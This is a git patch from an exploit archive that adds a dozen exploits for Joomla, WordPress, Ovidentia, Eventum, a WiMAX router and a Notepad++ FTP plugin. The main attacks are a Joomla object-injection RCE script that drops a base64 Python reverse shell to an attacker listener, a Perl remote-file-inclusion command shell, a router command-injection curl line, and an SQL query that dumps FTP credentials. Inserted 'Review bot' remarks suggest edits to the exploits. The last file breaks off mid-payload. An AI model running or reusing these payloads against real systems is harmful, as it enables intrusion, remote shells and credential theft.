From 216678b9be19f62c4b807513fa302146e0b8d732 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 22 Dec 2015 05:03:05 +0000
Subject: [PATCH] DB: 2015-12-22 12 new exploits
---
files.csv | 10 ++
platforms/cgi/dos/39073.txt | 8 +
platforms/cgi/remote/39074.txt | 9 ++
platforms/php/webapps/38977.py | 44 ++++++
platforms/php/webapps/39033.py | 131 +++++++++++++++++
platforms/php/webapps/39063.txt | 18 +++
platforms/php/webapps/39064.txt | 59 ++++++++
platforms/php/webapps/39065.txt | 11 ++
platforms/php/webapps/39066.txt | 11 ++
platforms/php/webapps/39068.txt | 25 ++++
platforms/php/webapps/39069.pl | 72 +++++++++
platforms/windows/dos/39067.py | 249 ++++++++++++++++++++++++++++++++
platforms/windows/dos/39070.txt | 52 +++++++
13 files changed, 699 insertions(+)
create mode 100755 platforms/cgi/dos/39073.txt
create mode 100755 platforms/cgi/remote/39074.txt
create mode 100755 platforms/php/webapps/38977.py
create mode 100755 platforms/php/webapps/39033.py
create mode 100755 platforms/php/webapps/39063.txt
create mode 100755 platforms/php/webapps/39064.txt
create mode 100755 platforms/php/webapps/39065.txt
create mode 100755 platforms/php/webapps/39066.txt
create mode 100755 platforms/php/webapps/39068.txt
create mode 100755 platforms/php/webapps/39069.pl
create mode 100755 platforms/windows/dos/39067.py
create mode 100755 platforms/windows/dos/39070.txt
diff --git a/files.csv b/files.csv
index f8a769c52..ea8dc5e3c 100755
--- a/files.csv
+++ b/files.csv
@@ -35317,3 +35317,13 @@ id,file,description,date,author,platform,type,port
 39060,platforms/php/webapps/39060.txt,"XOS Shop 'goto' Parameter SQL Injection Vulnerability",2014-01-24,JoKeR_StEx,php,webapps,0
 39061,platforms/android/local/39061.txt,"GoToMeeting for Android Multiple Local Information Disclosure Vulnerabilities",2014-01-23,"Claudio J. Lacayo",android,local,0
 39062,platforms/php/webapps/39062.txt,"ZenPhoto SQL Injection",2014-01-24,KedAns-Dz,php,webapps,0
+39063,platforms/php/webapps/39063.txt,"WordPress WP e-Commerce Plugin Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
+39064,platforms/php/webapps/39064.txt,"Maian Uploader 4.0 Multiple Security Vulnerabilities",2014-01-24,KedAns-Dz,php,webapps,0
+39065,platforms/php/webapps/39065.txt,"Eventum Insecure File Permissions Vulnerability",2014-01-27,"High-Tech Bridge",php,webapps,0
+39066,platforms/php/webapps/39066.txt,"Eventum 'hostname' Parameter Remote Code Execution Vulnerability",2014-01-28,"High-Tech Bridge",php,webapps,0
+39067,platforms/windows/dos/39067.py,"Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow",2015-12-21,R-73eN,windows,dos,0
+39068,platforms/php/webapps/39068.txt,"Ovidentia online Module 2.8 - GLOBALS[babAddonPhpPath] Remote File Inclusion",2015-12-21,bd0rk,php,webapps,0
+39069,platforms/php/webapps/39069.pl,"Ovidentia Widgets 1.0.61 - Remote Command Execution Exploit",2015-12-21,bd0rk,php,webapps,80
+39070,platforms/windows/dos/39070.txt,"Base64 Decoder 1.1.2 - SEH OverWrite PoC",2015-12-21,Un_N0n,windows,dos,0
+39073,platforms/cgi/dos/39073.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/reboot.cgi Unauthenticated Remote Reboot DoS",2014-02-03,"Josue Rojas",cgi,dos,0
+39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router /cgi-bin/diagnostic.cgi ping_ipaddr Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0
diff --git a/platforms/cgi/dos/39073.txt b/platforms/cgi/dos/39073.txt
new file mode 100755
index 000000000..ef6e16d22
--- /dev/null
+++ b/platforms/cgi/dos/39073.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/65306/info
+
+WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
+
+Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
+
+http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
+http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply
diff --git a/platforms/cgi/remote/39074.txt b/platforms/cgi/remote/39074.txt
new file mode 100755
index 000000000..6643e8139
--- /dev/null
+++ b/platforms/cgi/remote/39074.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/65306/info
+
+WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.
+
+Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.
+
+curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls
+-lash /etc%23&ping_count=1&action=Apply&html_view=ping"
+"http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null
\ No newline at end of file
diff --git a/platforms/php/webapps/38977.py b/platforms/php/webapps/38977.py
new file mode 100755
index 000000000..ed3c04082
--- /dev/null
+++ b/platforms/php/webapps/38977.py
@@ -0,0 +1,44 @@ +''' + Simple PoC for Joomla Object Injection. + Gary @ Sec-1 ltd + http://www.sec-1.com/ +''' + +import requests # easy_install requests + +def get_url(url, user_agent): + + headers = { + 'User-Agent': user_agent + } + cookies = requests.get(url,headers=headers).cookies + for _ in range(3): + response = requests.get(url, headers=headers,cookies=cookies) + return response + +def php_str_noquotes(data): + "Convert string to chr(xx).chr(xx) for use in php" + encoded = "" + for char in data: + encoded += "chr({0}).".format(ord(char)) + + return encoded[:-1] + + +def generate_payload(php_payload): + + php_payload = "eval({0})".format(php_str_noquotes(php_payload)) + + terminate = '\xf0\xfd\xfd\xfd'; + exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' + injected_payload = "{};JFactory::getConfig();exit".format(php_payload) + exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) + exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate + + return exploit_template + + + +pl = generate_payload("system('touch /tmp/fx');") + +print get_url("http://172.31.6.242/", pl) \ No newline at end of file diff --git a/platforms/php/webapps/39033.py b/platforms/php/webapps/39033.py new file mode 100755 index 000000000..d208330b3 --- /dev/null +++ b/platforms/php/webapps/39033.py 
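Review bot: In 38977.py the last two statements build the payload and call `get_url("http://172.31.6.242/", pl)` at module level, so simply running or importing the file sends the request to that hard-coded address. Wrapping them in `if __name__ == "__main__":` and adding a comment that the address is presumably the author's lab host would prevent an accidental send. `get_url` and `generate_payload` have no docstrings; one line on `get_url` stating that the serialized object is carried in the `User-Agent` header, and that the cookie from the first response is replayed on the following requests, would tell a reader which request field to look at in server logs.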
@@ -0,0 +1,131 @@ +#!/usr/bin/env python + +# Exploit Title: Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header +# Date: 12/17/2015 +# Exploit Author: original - Gary@ Sec-1 ltd, Modified - Andrew McNicol BreakPoint Labs (@0xcc_labs) +# Vendor Homepage: https://www.joomla.org/ +# Software Link: http://joomlacode.org/gf/project/joomla/frs/ +# Version: Joomla 1.5 - 3.4.5 +# Tested on: Ubuntu 14.04.2 LTS (Joomla! 3.2.1 Stable) +# CVE : CVE-2015-8562 + + +''' + Joomla 1.5 - 3.4.5 Object Injection RCE - CVE-2015-8562 + PoC for CVE-2015-8562 to spawn a reverse shell or automate RCE + + Original PoC from Gary@ Sec-1 ltd (http://www.sec-1.com): + https://www.exploit-db.com/exploits/38977/ + + Vulnerability Info, Exploit, Detection: + https://breakpoint-labs.com/joomla-rce-cve-2015-8562/ + + Exploit modified to use "X-Forwarded-For" header instead of "User-Agent" to avoid default logged to access.log + + Usage - Automate Blind RCE: + python joomla-rce-2-shell.py -t http://192.168.1.139/ --cmd + $ touch /tmp/newhnewh + + Usage - Spawn Reverse Shell using Pentestmonkey's Python one-liner and netcat listener on local host: + python joomla-rce-2-shell.py -t http://192.168.1.139/ -l 192.168.1.119 -p 4444 + [-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: http://192.168.1.139/ + [-] Uploading python reverse shell with LHOST:192.168.1.119 and LPORT:4444 + + [+] Spawning reverse shell.... 
+ + + Listening on [0.0.0.0] (family 0, port 4444) + $ python -c "import pty;pty.spawn('/bin/bash')" + www-data@ubuntu:/$ id + uid=33(www-data) gid=33(www-data) groups=33(www-data) + www-data@ubuntu:/$ + +''' + +import requests +import subprocess +import argparse +import sys +import base64 + +# Heavy lifting from PoC author Gary@ Sec-1 ltd (http://www.sec-1.com) +def get_url(url, user_agent): + + headers = { + 'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3', # Change default UA for Requests + 'x-forwarded-for': user_agent # X-Forwarded-For header instead of UA + } + cookies = requests.get(url,headers=headers).cookies + for _ in range(3): + response = requests.get(url, headers=headers,cookies=cookies) + return response + + +def php_str_noquotes(data): + "Convert string to chr(xx).chr(xx) for use in php" + encoded = "" + for char in data: + encoded += "chr({0}).".format(ord(char)) + + return encoded[:-1] + + +def generate_payload(php_payload): + + php_payload = "eval({0})".format(php_str_noquotes(php_payload)) + + terminate = '\xf0\xfd\xfd\xfd'; + exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' + injected_payload = "{};JFactory::getConfig();exit".format(php_payload) + exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) + exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate + + return exploit_template + + +def main(): + parser = argparse.ArgumentParser(prog='cve-2015-8562.py', description='Automate blind RCE for Joomla vuln CVE-2015-8652') + parser.add_argument('-t', dest='RHOST', required=True, 
help='Remote Target Joomla Server') + parser.add_argument('-l', dest='LHOST', help='specifiy local ip for reverse shell') + parser.add_argument('-p', dest='LPORT', help='specifiy local port for reverse shell') + parser.add_argument('--cmd', dest='cmd', action='store_true', help='drop into blind RCE') + + args = parser.parse_args() + + if args.cmd: + print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) + print "[-] Dropping into shell-like environment to perform blind RCE" + while True: + command = raw_input('$ ') + cmd_str = "system('{}');".format(command) + pl = generate_payload(cmd_str) + print get_url(args.RHOST, pl) + + # Spawn Reverse Shell using Netcat listener + Python shell on victim + elif args.LPORT and args.LPORT: + connection = "'{}', {}".format(args.LHOST, args.LPORT) + + # pentestmonkey's Python reverse shell one-liner: + shell_str = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('''+connection+'''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);''' + # Base64 encoded the Python reverse shell as some chars were messing up in the exploit + encoded_comm = base64.b64encode(shell_str) + # Stage 1 payload Str + payload = "echo {} | base64 -d > /tmp/newhnewh.py".format(encoded_comm) + print "[-] Attempting to exploit Joomla RCE (CVE-2015-8562) on: {}".format(args.RHOST) + print "[-] Uploading python reverse shell with LHOST {} and {}".format(args.LHOST, args.LPORT) + # Stage 1: Uploads the Python reverse shell to "/tmp/newhnewh.py" + pl = generate_payload("system('"+payload+"');") + print get_url(args.RHOST, pl) + # Spawns Shell listener using netcat on LHOST + listener = subprocess.Popen(args=["gnome-terminal", "--command=nc -lvp "+args.LPORT]) + print "[+] Spawning reverse shell...." 
+ # Stage 2: Executes Python reverse shell back to LHOST:LPORT
+ pl = generate_payload("system('python /tmp/newhnewh.py');")
+ print get_url(args.RHOST, pl)
+ else:
+ print '[!] missing arguments'
+ parser.print_help()
+
+
+if __name__ == "__main__":
+ main()
diff --git a/platforms/php/webapps/39063.txt b/platforms/php/webapps/39063.txt
new file mode 100755
index 000000000..69c710c3c
--- /dev/null
+++ b/platforms/php/webapps/39063.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/65130/info
+
+The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including:
+
+1. Multiple remote code-execution vulnerabilities.
+2. A local file-include vulnerability
+3. An arbitrary file-upload vulnerability
+
+An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, upload arbitrary files to the affected computer that may result in arbitrary code execution within the context of the vulnerable application.
+
+WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected.
+
+Local file-include
+http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]
+
+Remote code-execution
+http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
+http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]
\ No newline at end of file
diff --git a/platforms/php/webapps/39064.txt b/platforms/php/webapps/39064.txt
new file mode 100755
index 000000000..45044bea8
--- /dev/null
+++ b/platforms/php/webapps/39064.txt
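Review bot: In 39033.py the `argparse` description names `CVE-2015-8652`, while the file header, the docstring and both status messages say CVE-2015-8562; it should read `description='Automate blind RCE for Joomla vuln CVE-2015-8562'` so that a search by identifier leads to the right advisory. The `-l` and `-p` help strings also spell `specifiy`. The header says the payload was moved to `x-forwarded-for` to stay out of the default access.log, and the reverse-shell branch writes `/tmp/newhnewh.py` on the target and never removes it, yet neither fact is stated next to the code. A comment on `get_url` naming the header and one on the stage-1 line naming the leftover file would help whoever cleans up after an authorised test or builds a detection from this PoC.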
@@ -0,0 +1,59 @@ +source: http://www.securityfocus.com/bid/65137/info + +Maian Uploader is prone to multiple security vulnerabilities, including: + +1. An SQL-injection vulnerability +2. Multiple cross-site scripting vulnerabilities + +Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Maian Uploader 4.0 is vulnerable; other versions may also be affected. + ++] Exploit (1) ' SQL Injection ' => +# +# 92 ) +# $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members +# WHERE id != '".$_POST['id']."' +# ORDER BY accname") or die(mysql_error()); +# +# */ +# +# $sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members"; +# +# $ch = curl_init(); +# curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); +# curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php"); +# curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); +# curl_setopt($ch, CURLOPT_POST, 1); +# curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli"); +# $exploit = curl_exec ($ch); +# curl_close($ch); +# unset($ch); +# echo $exploit; +# ?> +# +#### +# +# [+] Exploit (2) ' XSRF/XSS ' => +# +# - load_flv.js.php ( line : 25 ) +# document.write('

XsS by KedAns-Dz

+# XSS : "> +# +# http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ] +# http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ] +# +# [&] Exploit (3) ' Full Path Disclosure ' => +# +# don't put ( &height= ) after width Xss and you get error +# Notice about ( Undefined index: height ) with the Full Path Dir. +# +###################################################################### diff --git a/platforms/php/webapps/39065.txt b/platforms/php/webapps/39065.txt new file mode 100755 index 000000000..711820dc8 --- /dev/null +++ b/platforms/php/webapps/39065.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/65186/info + +Eventum is prone to an insecure file-permission vulnerability. + +An attacker can exploit this issue to reinstall vulnerable application. This may aid in further attacks. + +Eventum 2.3.4 is vulnerable; other versions may also be affected. + +Following example URI is available. + +http://www.example.com/setup/index.php \ No newline at end of file diff --git a/platforms/php/webapps/39066.txt b/platforms/php/webapps/39066.txt new file mode 100755 index 000000000..dda6bf871 --- /dev/null +++ b/platforms/php/webapps/39066.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/65196/info + +Eventum is prone to remote code execution vulnerability. + +Successfully exploiting this issue allows attackers to execute arbitrary PHP code in the context of the affected application. + +Eventum prior to 2.3.4 are vulnerable. + +Following example URL is available. + +http://www.example.com/index.php?cmd=phpinfo%28%29; \ No newline at end of file diff --git a/platforms/php/webapps/39068.txt b/platforms/php/webapps/39068.txt new file mode 100755 index 000000000..75e0170d1 --- /dev/null +++ b/platforms/php/webapps/39068.txt 
@@ -0,0 +1,25 @@
+# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
+# Author: bd0rk
+# eMail: bd0rk[at]hackermail.com
+# Twitter: twitter.com/bd0rk
+# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832
+
+PoC:
+/online-2-8/programs/admin.php line 2
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+require_once( $GLOBALS['babAddonPhpPath']."functions.php");
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+[+]Exploit: http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?
+
+Description: The $GLOBALS['babAddonPhpPath']-parameter isn't declared before qequire_once.
+ So it's possible to compromise the web-server about it.
+ An attacker can inject s0me php-shellcode.
+ I think, it's a big problem in this web-software!
+
+Patch: You can declare the vulnerable parameter or use an alert.
+
+
+~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~
+
+
diff --git a/platforms/php/webapps/39069.pl b/platforms/php/webapps/39069.pl
new file mode 100755
index 000000000..aca09d00c
--- /dev/null
+++ b/platforms/php/webapps/39069.pl
@@ -0,0 +1,72 @@ +# Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit +# Author: bd0rk +# eMail: bd0rk[at]hackermail.com +# Twitter: twitter.com/bd0rk +# Tested on: Ubuntu-Linux +# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FLibrairies+partagees%2FWidgets&file=widgets-1-0-61.zip&idf=870 +# The $GLOBALS['babInstallPath']-parameter in /programs/groups.php line 24 is vulnerable for it. +# Use some shellcode / c99 for example. +---------------- +~~Exploitcode~~ +---------------- + +use LWP::UserAgent; +use HTTP::Request; +use LWP::Simple; +use Getopt::Long; + +sub clear{ +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); +} + +&clear(); + +sub bd0rk { +print "Ovidentia Widgets 1.0.61 Remote Command Execution Exploit\n"; +print "Sploit:\n"; +print "$0 -v \"http://[target]/path/programs/\" -shellcode \"http://[target]/shell.txt?\"\n\n"; +exit(); +} + +my $a = GetOptions ( +'v=s' => \$v, +'shellcode=s' => \$shellcode +); + +&bd0rk unless ($v); +&bd0rk unless ($shellcode); + +&bd0rk if $bd0rk eq 1; + +chomp($v); +chomp($shellcode); + +while (){ + +print "[shellcode]:~\$ "; +chomp($cmd=); + +if ($cmd eq "exit" || $cmd eq "quit") { +exit 0; +} +my $agent = LWP::UserAgent->new; +$in="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1"; +chomp($in); +my $a = $v ."/widgets-1-0-61/programs/groups.php?GLOBALS[babInstallPath]=" . $shellcode . $in; +chomp $a; +my $request = HTTP::Request->new(Get => $a); +my $resource = $agent->request($request); +my $content = $resource->content; +if ($resource->is_success){ +print $1,"\n" if ($content =~ m/readonly> (.*?)\<\/textarea>/mosix); +} + +else +{ +print "EXPLOIT FAILURE\n"; +exit(1); +} +} + + + diff --git a/platforms/windows/dos/39067.py b/platforms/windows/dos/39067.py new file mode 100755 index 000000000..2e51342f2 --- /dev/null +++ b/platforms/windows/dos/39067.py 
@@ -0,0 +1,249 @@ +# Title : Notepad ++ NPPFtp Plugin Buffer Overflow +# Date : 19/12/2015 +# Author : R-73eN +# Tested on : NPPFtp 0.26.3 (Latest Version) +# Software : http://sourceforge.net/projects/nppftp/ +# Vendor : https://notepad-plus-plus.org/ +# ___ __ ____ _ _ +# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | +# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | +# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ +# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____| +# +# A buffer overflow exists in the NPPftp plugin. When the plugin is connected to a malicious server +# which server a crafted LIST response causes the application to crash. +# +# How to reproduce +# +# 1. Start this python server +# 2. Open Notepad ++ , go to plugins , NPPFtp, Show windows +# 3. Click on the gear button to create a new connection. +# 4. Create the connection to connect to the server. +# 5. Connect and the application will crash. + +import os,socket,threading,time +allow_delete = False +local_ip = "192.168.1.121"#socket.gethostbyname(socket.gethostname()) +local_port = 21 +currdir=os.path.abspath('.') + +buff = "rwxrwxrwx 1 1 00" + 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5C
o6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9E